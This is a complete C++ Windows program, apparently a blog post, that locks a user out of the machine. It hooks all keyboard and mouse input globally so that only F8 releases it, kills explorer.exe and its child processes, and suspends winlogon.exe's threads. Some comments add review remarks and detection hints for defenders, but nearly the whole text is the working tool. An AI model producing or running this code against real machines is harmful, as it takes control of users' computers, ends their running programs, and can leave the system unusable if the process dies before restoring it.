Hook-沉寂
2023-08-10 20:57:04
#include <Windows.h>
#include <TlHelp32.h>
#include <iostream>
#include <string>
using namespace std;
// Handles of the two low-level (WH_*_LL) hooks set by InstallHooks() and
// released by UninstallHooks(); nullptr whenever no hook is installed.
// The hook procedures pass these to CallNextHookEx when they forward an event.
HHOOK g_HookKeyboard = nullptr;
HHOOK g_HookMouse = nullptr;
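/// Enables SeDebugPrivilege on the current process token.
/// @return TRUE only when the privilege is actually enabled. FALSE when the
///         token cannot be opened, the privilege name cannot be resolved, or
///         the token does not hold the privilege. The last case is the one the
///         original missed: AdjustTokenPrivileges returns nonzero even when it
///         assigned nothing and signals that only via ERROR_NOT_ALL_ASSIGNED.
/// The token handle is always closed, on every path.
BOOL EnableDebugPrivilege() {
    HANDLE hToken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return FALSE;
    }
    BOOL enabled = FALSE;
    TOKEN_PRIVILEGES tokenPrivileges = {};
    tokenPrivileges.PrivilegeCount = 1;
    tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    // Previously unchecked: on failure the LUID would have been left
    // uninitialised and handed to AdjustTokenPrivileges anyway.
    if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tokenPrivileges.Privileges[0].Luid)) {
        if (AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)
            && GetLastError() != ERROR_NOT_ALL_ASSIGNED) {
            enabled = TRUE;
        }
    }
    CloseHandle(hToken);
    return enabled;
}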
/// Returns the PID of the first "explorer.exe" entry in a Toolhelp process
/// snapshot, or 0 when none is found or the snapshot cannot be taken.
/// The match is exact and case-sensitive on the ANSI image name (szExeFile),
/// which is consistent with the file being built without UNICODE.
DWORD GetExplorerProcessID() {
    const HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }
    DWORD foundPid = 0;
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(entry);
    for (BOOL more = Process32First(snapshot, &entry); more; more = Process32Next(snapshot, &entry)) {
        if (string(entry.szExeFile) == "explorer.exe") {
            foundPid = entry.th32ProcessID;
            break;
        }
    }
    CloseHandle(snapshot);
    return foundPid;
}
/// Terminates every process whose parent PID (per a Toolhelp snapshot) is
/// parentPID, except the calling process, depth-first: a child's own
/// descendants are handled by recursion before the child itself is terminated.
/// @param parentPID  PID whose children are targeted.
/// All failures are silent: a failed snapshot, an OpenProcess that is denied,
/// or a failed TerminateProcess are simply skipped.
/// NOTE(review): parent/child links come from a point-in-time snapshot and
/// Windows reuses PIDs, so a PID matched here can belong to a different
/// process by the time OpenProcess runs — confirm whether that window matters
/// for the caller.
/// Defender note: each target produces an OpenProcess with PROCESS_TERMINATE
/// from this (non-system) process, which is the observable artefact.
void TerminateChildProcessesExceptSelf(DWORD parentPID) {
    DWORD currentPID = GetCurrentProcessId();
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot != INVALID_HANDLE_VALUE) {
        PROCESSENTRY32 pe32;
        pe32.dwSize = sizeof(PROCESSENTRY32);
        if (Process32First(hSnapshot, &pe32)) {
            do {
                // Never target the calling process itself.
                if (pe32.th32ParentProcessID == parentPID && pe32.th32ProcessID != currentPID) {
                    // The recursive call takes its own snapshot, so the
                    // iteration over hSnapshot here is not disturbed.
                    TerminateChildProcessesExceptSelf(pe32.th32ProcessID);
                    HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pe32.th32ProcessID);
                    if (hProcess != NULL) {
                        TerminateProcess(hProcess, 0);
                        CloseHandle(hProcess);
                    }
                }
            } while (Process32Next(hSnapshot, &pe32));
        }
        CloseHandle(hSnapshot);
    }
}
/// Suspends every thread of every process named "winlogon.exe" in a Toolhelp
/// snapshot: one SuspendThread per thread. Undone by
/// RestartExplorerAndResumeWinlogon(), which issues one ResumeThread per thread.
/// The process handle opened with PROCESS_SUSPEND_RESUME is used only as a
/// gate (nothing is called on it); the suspension itself goes through thread
/// handles opened with THREAD_SUSPEND_RESUME. If the process cannot be opened
/// the entry is skipped silently, as are thread-open failures.
/// NOTE(review): success here presumably depends on EnableDebugPrivilege()
/// having actually enabled SeDebugPrivilege — its return value is never
/// checked by the caller; confirm.
/// Defender note: the artefact is a process-handle open on winlogon.exe
/// (PROCESS_SUSPEND_RESUME) followed by a burst of thread-handle opens from a
/// non-system process; Sysmon ProcessAccess (event 10) records the
/// GrantedAccess of the process-handle open.
void SuspendWinlogonProcess() {
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot != INVALID_HANDLE_VALUE) {
        PROCESSENTRY32 pe32;
        pe32.dwSize = sizeof(PROCESSENTRY32);
        if (Process32First(hSnapshot, &pe32)) {
            do {
                if ((string)pe32.szExeFile == (string)"winlogon.exe") {
                    HANDLE hProcess = OpenProcess(PROCESS_SUSPEND_RESUME, FALSE, pe32.th32ProcessID);
                    if (hProcess != NULL) {
                        // TH32CS_SNAPTHREAD enumerates all threads system-wide;
                        // the owner-PID test below narrows to this winlogon instance.
                        HANDLE hThreadSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
                        if (hThreadSnapshot != INVALID_HANDLE_VALUE) {
                            THREADENTRY32 te32;
                            te32.dwSize = sizeof(THREADENTRY32);
                            if (Thread32First(hThreadSnapshot, &te32)) {
                                do {
                                    if (te32.th32OwnerProcessID == pe32.th32ProcessID) {
                                        HANDLE hThread = OpenThread(THREAD_SUSPEND_RESUME, FALSE, te32.th32ThreadID);
                                        if (hThread != NULL) {
                                            // Raises the thread's suspend count by exactly one.
                                            SuspendThread(hThread);
                                            CloseHandle(hThread);
                                        }
                                    }
                                } while (Thread32Next(hThreadSnapshot, &te32));
                            }
                            CloseHandle(hThreadSnapshot);
                        }
                        CloseHandle(hProcess);
                    }
                }
            } while (Process32Next(hSnapshot, &pe32));
        }
        CloseHandle(hSnapshot);
    }
}
/// Recovery path: launches a fresh explorer.exe via ShellExecute, then issues
/// one ResumeThread per thread of every "winlogon.exe" process found.
/// Unlike SuspendWinlogonProcess() no process handle is opened here — only
/// THREAD_SUSPEND_RESUME thread handles. All failures are silent.
/// NOTE(review): ResumeThread only decrements a thread's suspend count, so
/// this restores winlogon only if SuspendWinlogonProcess() ran exactly once
/// beforehand; confirm the callers keep that pairing.
/// The narrow string literals passed to ShellExecute (and the (string) casts on
/// szExeFile in the sibling functions) show this file is built without UNICODE.
void RestartExplorerAndResumeWinlogon() {
    ShellExecute(NULL, "open", "explorer.exe", NULL, NULL, SW_SHOWDEFAULT);
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot != INVALID_HANDLE_VALUE) {
        PROCESSENTRY32 pe32;
        pe32.dwSize = sizeof(PROCESSENTRY32);
        if (Process32First(hSnapshot, &pe32)) {
            do {
                if ((string)pe32.szExeFile == (string)"winlogon.exe") {
                    // System-wide thread snapshot, filtered by owner PID below.
                    HANDLE hThreadSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
                    if (hThreadSnapshot != INVALID_HANDLE_VALUE) {
                        THREADENTRY32 te32;
                        te32.dwSize = sizeof(THREADENTRY32);
                        if (Thread32First(hThreadSnapshot, &te32)) {
                            do {
                                if (te32.th32OwnerProcessID == pe32.th32ProcessID) {
                                    HANDLE hThread = OpenThread(THREAD_SUSPEND_RESUME, FALSE, te32.th32ThreadID);
                                    if (hThread != NULL) {
                                        // Exactly one resume per thread, mirroring the single suspend.
                                        ResumeThread(hThread);
                                        CloseHandle(hThread);
                                    }
                                }
                            } while (Thread32Next(hThreadSnapshot, &te32));
                        }
                        CloseHandle(hThreadSnapshot);
                    }
                }
            } while (Process32Next(hSnapshot, &pe32));
        }
        CloseHandle(hSnapshot);
    }
}
/// Low-level keyboard hook procedure.
/// For HC_ACTION key-down and sys-key-down events it returns 1, so the event
/// is consumed and reaches neither further hooks nor the foreground window;
/// F8 additionally posts WM_QUIT, which ends the message loop in main().
/// Every other code/message (including key-up) is forwarded via CallNextHookEx.
LRESULT CALLBACK KeyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) {
    const bool isKeyDown = (wParam == WM_KEYDOWN) || (wParam == WM_SYSKEYDOWN);
    if (nCode != HC_ACTION || !isKeyDown) {
        return CallNextHookEx(g_HookKeyboard, nCode, wParam, lParam);
    }
    const KBDLLHOOKSTRUCT* const keyEvent = reinterpret_cast<const KBDLLHOOKSTRUCT*>(lParam);
    if (keyEvent->vkCode == VK_F8) {
        PostQuitMessage(0);
    }
    return 1;
}
/// Low-level mouse hook procedure: every HC_ACTION event is consumed
/// (returns 1, never forwarded); any other code is passed to the next hook.
LRESULT CALLBACK MouseHookProc(int nCode, WPARAM wParam, LPARAM lParam) {
    if (nCode != HC_ACTION) {
        return CallNextHookEx(g_HookMouse, nCode, wParam, lParam);
    }
    return 1;
}
/// Installs the global low-level keyboard and mouse hooks into the two
/// g_Hook* globals. The SetWindowsHookEx results are not checked; a failed
/// install leaves the corresponding global NULL, which UninstallHooks()
/// tolerates.
void InstallHooks() {
    const HMODULE self = GetModuleHandle(NULL);
    g_HookKeyboard = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardHookProc, self, 0);
    g_HookMouse = SetWindowsHookEx(WH_MOUSE_LL, MouseHookProc, self, 0);
}
/// Removes whichever of the two hooks is installed and resets its global to
/// nullptr; a global that is already null is left alone.
void UninstallHooks() {
    auto release = [](HHOOK& hook) {
        if (hook) {
            UnhookWindowsHookEx(hook);
            hook = nullptr;
        }
    };
    release(g_HookKeyboard);
    release(g_HookMouse);
}
/// Terminates every process named "explorer.exe" in a Toolhelp snapshot
/// (exact, case-sensitive match on the ANSI image name). Entries that cannot
/// be opened with PROCESS_TERMINATE are skipped silently, as is a failed
/// snapshot.
void TerminateAllExplorerProcesses() {
    const HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        return;
    }
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(entry);
    for (BOOL more = Process32First(snapshot, &entry); more; more = Process32Next(snapshot, &entry)) {
        if (string(entry.szExeFile) != "explorer.exe") {
            continue;
        }
        const HANDLE process = OpenProcess(PROCESS_TERMINATE, FALSE, entry.th32ProcessID);
        if (process != NULL) {
            TerminateProcess(process, 0);
            CloseHandle(process);
        }
    }
    CloseHandle(snapshot);
}
/// Entry point. The order of the calls is load-bearing:
///   1. InstallHooks()          — input hooks go in before anything is disturbed.
///   2. EnableDebugPrivilege()  — return value ignored; if it fails, the later
///                                OpenProcess calls on winlogon fail silently.
///   3. Only if an explorer.exe PID was found: kill its child tree (except
///      this process) and suspend winlogon. NOTE(review): the winlogon
///      suspension is gated on explorer being present, which looks like
///      incidental coupling rather than a precondition — confirm.
///   4. Terminate every explorer.exe.
///   5. Pump messages until WM_QUIT, which only the F8 branch of
///      KeyboardHookProc posts.
///   6. Unhook, then run the recovery path.
/// Nothing in this file is persisted (no file or registry writes), and the
/// only code that resumes winlogon's threads is step 6; if this process dies
/// before reaching it, nothing else in this file restores them.
int main() {
    InstallHooks();
    EnableDebugPrivilege();
    DWORD explorerPID = GetExplorerProcessID();
    if (explorerPID != 0) {
        TerminateChildProcessesExceptSelf(explorerPID);
        SuspendWinlogonProcess();
    }
    TerminateAllExplorerProcesses();
    MSG msg;
    // GetMessage returns 0 on WM_QUIT, ending the loop.
    while (GetMessage(&msg, NULL, 0, 0)) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
    UninstallHooks();
    RestartExplorerAndResumeWinlogon();
    return 0;
}